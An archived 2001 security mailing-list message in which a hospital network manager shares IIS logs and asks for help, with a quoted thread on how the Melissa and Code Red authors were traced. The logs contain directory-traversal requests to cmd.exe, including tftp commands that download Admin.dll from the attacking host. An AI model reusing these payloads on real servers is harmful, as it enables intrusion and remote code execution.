Re: [RE: Any leads?]

From: J.Michael Cuciti (mcuciti@private)
Date: Fri Sep 21 2001 - 13:43:36 PDT

  • Next message: Kuo, Jimmy: "RE: Any leads?"

    All:
    
    I still have a script trying to run, but the location and folder doesn't
    exist.  The is what I found in my log file:
    
    206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, 304,
    200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe,
    /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll, 
    
    206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, 151, 304,
    200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe,
    /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll, 
    
    206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, 273,
    403, 5, GET, /scripts/root.exe, /c+dir, 
    
    206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, 1652,
    200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 
    
    208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, 243,
    500, 123, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir, 
    
    If anybody knows what this is, please 'spain it to me.
    
    I am running IIS 3.0, NT4.0 w/sp3 (haven't ungraded, I inherited this, not my
    fault :-) )
    
    In the event log I see this same type of message running every few minutes. 
    The script is supposedly running from
    \winnt\iisadmin\Scripts\..%5c..\admin.dll.  This does not exist.
    
    Thanks...
    
    Mike Cuciti
    Network Service and Support MAnager
    Tuality Healthcare
    681.1749
    
    
    "Kuo, Jimmy" <Jimmy_Kuo@private> wrote:
    >The Melissa author was caught because he posted the infectious document 
    >from his own AOL account to a news group, rather than releasing it 
    >through a hacked account. His guilt was confirmed when the serial number 
    >in the document matched the PC in the dumpster outside his bedroom :-)
    
    No.  He used a hacked acct.  But we identified the exact time of the use of
    the acct (newsgroup posting message ID) and the FBI traced the phone
    records.
    
    And the PC was destroyed and never located.
    
    Where did you get your version of the story?
    
    >But Code Red and its derivatives is not an Office document, and 
    >therefore has no serial numbers. That investigators appear to have no 
    >leads months after Code Red appeared tells me that it was likely 
    >released to the wild from a compromised machine, or perhaps 
    >simultaneously released from multiple compromised machines. If the 
    >author(s) were good, then those compromised machines were initially 
    >attacked from other compromised machines. Likely all of these initial 
    >release vector machines have long since been wiped and re-installed, and 
    >the links to the author(s) have been cut.
    
    We have some "first instances" of traffic.  I don't know what the FBI's
    doing with the information gathered so far.  But I agree that it's difficult
    and not likely.
    
    Jimmy
    



    This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:38 PDT